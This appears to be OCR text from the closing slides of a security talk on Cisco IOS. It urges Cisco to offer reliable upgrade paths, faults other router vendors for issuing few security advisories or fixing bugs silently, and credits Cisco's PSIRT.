
■ Brave network engineers run 12.3 

■ VolPioneers run 12.4 (and fail) 

Make Cisco provide clear upgrade paths 

■ Guarantee that 1 2.2(1 3)T1 7 Telco -> 1 2.4(9)T6 Telco actually works 

■ Provide tools for automatic configuration adjustment 
Cisco, Do Your Job! 
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Complain to Juniper, Huawei, 



■ ■■ 



The lack of security advisories for the other big 
router vendors can only mean: 

1 . Their stuff is perfectly secure 

2. Their stuff gets fixed silently 

3. Their stuff doesn't even get internal security testing 

While silently fixing security bugs is a trend 
(thanks Linus!), it's not acceptable for 
infrastructure equipment 

Cisco is actually doing a better job than everyone 
else in the networking industry when it comes to 
product security. PSIRT FTW! /&_ 
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Thank you! 
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